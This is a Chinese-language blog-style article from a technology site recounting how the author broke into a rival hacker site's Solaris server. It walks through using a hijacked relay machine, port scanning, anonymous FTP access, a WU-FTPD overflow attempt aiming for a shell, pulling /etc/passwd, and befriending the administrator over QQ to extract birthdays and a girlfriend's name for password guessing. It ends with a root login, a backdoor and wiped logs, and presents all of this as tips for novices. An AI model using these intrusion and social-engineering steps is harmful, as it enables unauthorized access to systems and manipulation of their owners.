无忧技术网
无忧技术网 - RSS订阅 

黑国内一黑客站点主机的过程


作者:[佚名] - 发布:2010-4-22 17:35:38 - 来源:无忧技术网
在qq上,有人以国内木xxx著名黑客站点而自居,嚣张之气,实在让人气愤,想来,俺也是做黑客站点的,

x年前上网的时候,这个站点还在娘胎里呢。实在是。。。。今天就来个黑对黑。。。嘿嘿。。

先对系统做个大致的了解。

登陆我开了3389的肉鸡,一切的准备工作都在上面做的。要小心啊,要不被鹰啄了眼可就不好了。

用那个不错的工具“清风火焰”登陆器上了肉鸡。打开cmd

ping www.xxx.org,没有返回值,一定屏蔽了ping。看来象个管理员。

不怕,试一下23端口

telnet www.xxx.org 呀,是sun os 5.7 啊。这个系统好象是不太好进呢。

开始扫描。

其实 扫描是通过选用远程TCP/IP不同的端口的服务,并记录目标给予的回答,通过这种方法,可以搜集到

很多关于目标主机的各种有用的信息(比如:是否能用匿名登陆!是否有可写的FTP目录,是否能用TELNET,

HTTPD是用ROOT还是nobady在跑!)我们的扫描器应该有三项功能:发现一个主机或网络的能力;一旦发现一台主机,有发现什么服务正运行在

这台主机上的能力;通过测试这些服务,发现漏洞的能力。

开始吧,从肉鸡上找到我隐藏的目录,都是好东西呢。用(SuperScan)这个还有个相应的端口报告生成。

结果:只有 21 23 80 1633 (这个端口是什么,报告没给出,管它呢)

看来我们的目标只能放在 ftp (21)和http(80)了。

先看有没有ftp匿名登陆,这个在国内的很多站点都存在的。

ftp www.xxx.org

WUFU-FTP2.4.16

user:ftp

passwd:xxx.21cn.com (最好是输个假的啊,呵呵)

呵呵,这个傻帽的管理员还吹呢。,,,俺进来了。。。。看看有什么权限吗?

ftp>ls

user
tmp
welcome
bin
etc
....
....

200 PORT Command successful.

ftp>cd user (5555,没有权限的)

ftp>cd temp

200 PORT Command successful.

ftp>put c:\boyhacker.txt

200 PORT Command successful.

哈哈!这个目录是可写的。。。管理员你要完了。。

ftp>bye

我记得好象谁写了篇文章就是利用WUFU-FTP2.4.16本地溢出漏洞进的吧。。来来,我们试一下。

但是溢出代码需编译的。的找个SUN OS 的肉鸡啊。看见了吗?肉鸡的重要性了吧。

#./wuftp www.xxx.com /tmp ftp/ftp@2.com -p 120

connect.....
send shell....
wait for you shell....

..........

呀呀呀呀,,,我在等关键的时刻。。。。

哇error.,完了,不是管理员啊。是我啊,进不去了。。放弃吗?回答:no 要有点黑客精神嘛。

再来。

不是还有个80端口吗?来,托出宝刀流光,(发点牢骚,有的人说,用流光的人不上档次,但是真的把流光用

的好的,有真对性的扫描未必低级)。简单的选了几项,扫。。。

出来了,cgi漏洞只有几个:

/class/mysql.class [漏洞描述]
/images/ [漏洞描述]
/manual/ [漏洞描述]
/mysql/ [漏洞描述]
/test/ [漏洞描述]
gi">[漏洞描述]

我记得好象这个/class/mysql.class 漏洞可以直接查看mysql的user password

可是结果没有成功。(现在才知道做黑客,难啊)

但是,不要放弃的。。不是还有个ect 目录吗》?先抓个密码再说。

ftp > get /etc/passwd

200 PORT Command successful.

看看密码:

df10% cat /etc/passwd
root:x:0:1:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
rudi:x:9001:10::/rudi:/bin/csh
liu:x:9002:10::/liu:/bin/csh
peng:x:9003:10::/peng:/bin/csh

呵呵这么多用户啊。。。。

怎么办呢?做黑客要弄脑子,要用智慧,我决定用上老米的社会工程学。

休息。

第2天,上qq,给那个吹的管理员聊起来了。以下是简单的记录:

我:老大啊,你很厉害啊,做了xxx黑客站点的管理员啊。

x:一般了,我学网络好几年了。

我:你是几几年上的网?

x:不是很早,99年。

我:呵呵,那你比我早啊,我是2003年上的网,那你是我的前辈了 (骗)

x:是的吧 (靠,不谦虚)

我:我是82年11月21出生的,老哥是几几年啊?

x: 我啊是80年10月26 ----------------(重点信息)

我:最近啊,我和女朋友分手了,很怀念她。那个时候不知道珍惜,老哥一定有女朋友吧 ------(动之以情)

x: 是的啊,我女朋友和我差不多大的,我比她大1个月零1天。----------(哇,重点信息)

我:呵呵,你的女朋友叫什么名字啊,网名一定很好听吧?

x: 她啊,名字是我给的(我似乎看见他甜蜜的样子)kekeren ---------(有戏)


以下省略。。。。。]

收集密码信息:801026 99801026 80925 80925521 kekeren80925 kekeren521---(我爱你)kekerenx

801026kekeren ------总之尽可能的组合。

接下来,到本文的结尾了,。。试吧。。。我是只用kekeren521就成功了。。看来他是个性情中人。。


telnet www.xxx.org

user:x

passwd:kekeren521

写到实在是不想写了。。权限是root,你想做任何你想做的事情。

不过,我还是没更改主页,做个后门(很多方法的),拉个软件下来,清除了pp跑了。。。

过天,在上qq上,把id给了x,可笑的是,x问我漏洞不多,是怎么拿到root的,呵呵,希望老大x见到此文不要

吐血。。。。


总结:其实这次黑站,其实没有什么真正的漏洞利用,但是不能不说,给菜鸟们一点思路,一点技巧。

黑客,不是从真正意义上的去黑,而是挑战自己,挑战困难,坚毅,执著,智慧,这才是我们要学的。。。。。

黑客总是聪明的。

责任编辑:liqwei
打印本页】【关闭本页】【返回列表
·上一篇:用dos命令扫描一个网段的全部端口,不需要任何工具
·下一篇:防火墙
 文章评分
  • current rating
-5 -4 -3 -2 -1 0 +1 +2 +3 +4 +5
 相关文章
·[安全防护]如何成为一名黑客 (2010-04-22)
·[安全防护]20世纪网络黑客大事记 (2010-04-22)
 相关评论
 站点最新文章 更多>> 
·[瀚海拾遗]国际狮子会
·[JS/CSS/HTML]Vue资源整理
·[程序综合]RESTful API最佳实践
·[PHP]PHP资源整理
·[管理与测试]Git资源整理
·[经典影音]火星救援
·[程序综合]词性标注集(北大版)
·[Java/JSP]泛型
·[协议规范]5类IP地址如何划分?
·[至理名言]曾国藩:利可共而不可独,谋可寡…
 站点浏览最多 更多>> 
·[协议规范]http断点续传原理:http头 Range、…
·[NoSQL]Mongo数据库简介
·[JS/CSS/HTML]HTML 空格的表示符号 nbsp / en…
·[协议规范]什么是SPF记录?如何设置、检测SP…
·[PHP]精选国外免费PHP空间推荐
·[程序综合]常用IP地址查询接口
·[协议规范]图解 HTTPS 通信过程
·[程序综合]什么是 DNS Prefetch ?
·[程序综合]获取客户端IP地址的三个HTTP请求…
·[PHP]国产常见PHP开源框架比较